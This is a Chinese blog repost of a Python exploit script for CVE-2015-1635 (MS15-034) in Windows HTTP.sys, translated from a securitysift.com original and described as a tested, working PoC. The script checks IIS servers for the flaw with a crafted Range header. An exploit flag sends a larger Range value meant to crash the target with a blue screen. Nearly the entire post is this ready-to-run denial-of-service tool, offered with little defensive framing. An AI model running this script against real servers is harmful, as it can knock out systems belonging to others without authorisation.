A-A+

http-cve2015-1635 EXP HTTP.sys 远程执行代码(CVE-2015-1635)

2016年04月20日 16:58 汪洋大海 暂无评论 阅读 988 views 次

本执行代码转载网络来源地址:http://www.securitysift.com/an-analysis-of-ms15-034/
本人经过汉化了,如果看着汉化的不顺眼可以自己去用原版。。。。
http-vuln-cve2015-1635.nse HTTP.sys 远程执行代码exp

网上的试验了几个都不好使,不知道为什么,但是下面的这个本人亲测,绝对可以用de POC。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/python
#coding=utf8
import urllib2
import sys
import argparse
import socket 
 
''' get cl args '''
def getArgs():
    parser = argparse.ArgumentParser( prog="ms15_034.py", 
				      formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
				      epilog= "这个脚本将测试存在或利用DOS状态ms15_034")
    parser.add_argument("target",  help="Target Host in the form of http://[host]:[port] -- specify port only if not 80" )								  
    parser.add_argument("-p", "--path", default="/welcome.png", help="资源在目标服务器上的路径 默认 [default = /welcome.png] 上面是win7的 /iis-85.png 是win2012的")
    parser.add_argument("-e", "--exploit", action="store_true", default=False, help="加上此参数则表示攻击此服务器 默认 [default = False]")
    parser.add_argument("-r", "--range", default="0-18446744073709551615", help="修改头部代码 默认 [default=0-18446744073709551615]; 这可能会导致对方服务器蓝屏!!!")
    args = parser.parse_args()
    return args
 
''' make the evil request and examine response to determine vulnerability '''
def evilRequest(req, exploit):
	res = ""
	if exploit:
		print "[*] 尝试测试中..."
	try:
		res = urllib2.urlopen(req).read() # make request
		if exploit:
			print "[*] 无法解析响应,检查目标,请查看是否成功!"
		else:
			print "[*] 请求成功,可能不易受攻击" # 如果没有返回错误,目标可能是不易受攻击的
	except:
		if "Requested Range Not Satisfiable" in str(sys.exc_info()[1]): # response if target is unpatched 
			print "[*] 恭喜恭喜它有漏洞呦!!!"
		elif "The Request has an invalid header name" in str(sys.exc_info()[1]): # typical response if target is patched 
			print "[*] 目标出现了"
		elif (("Connection reset by peer" in str(sys.exc_info()[1])) or ("forcibly closed" in str(sys.exc_info()[1]))) and (exploit): # often DoS exploit not successful on first attempt
			print "[*] 连接复位,重新尝试利用..."
			res = evilRequest(req, exploit)
		elif ("timed out" in str(sys.exc_info()[1])) and (exploit): # prevent loop after DoS function (used w/ socket timeout variable in main)
			print "[*] 请求超时,可能成功了呦。"
		elif ("timed out" in str(sys.exc_info()[1])) and (not exploit): # prevent loop after DoS function (used w/ socket timeout variable in main)
			print "[*] 请求超时,但利用开关不使用。你有没修改文件头大小?"
		else: 
			print "[*] 不能确定目标是否有漏洞" # any other response means vuln unknown
		print "\t[+] Response: %s" % str(sys.exc_info()[1])  # print server response
 
	return res 
 
''' main '''
def main():
	print
	print '============================================================================='
	print '|                     ms15_034.py - Test and DoS exploit                    |'
	print '|               Author: Mike Czumak (T_v3rn1x) - @SecuritySift              |'
	print '|                    虾米汉化 URL地址:http://gdd.gd/                       |'
	print '=============================================================================\n'
 
	args = getArgs() 
	target = args.target   # target server
	path = args.path       # path to resource to retrieve on target server
	range = args.range     # value of Range header
	exploit = args.exploit # boolean (exploit DoS or not)
 
	if exploit:
		range = "18-18446744073709551615" # evil range if requesting welcome.png
										   # may need to change if requesting different resource (use range arg instead)
 
	print "[*] Making request to " + target
	print "\t[+] Target path: " + path
	print "\t[+] Range Header: " + range
	print "\t[+] Exploit (DoS)?: " + str(exploit)
	print
 
	socket.setdefaulttimeout(10) # timeout the connection in event of DoS/reboot
	req = urllib2.Request( "%s%s"%(target,path), headers={ "Range" : "bytes=%s" % range }) # format request
	res = evilRequest(req, exploit) # make request
	print
 
if __name__ == '__main__':
    main()
标签:

给我留言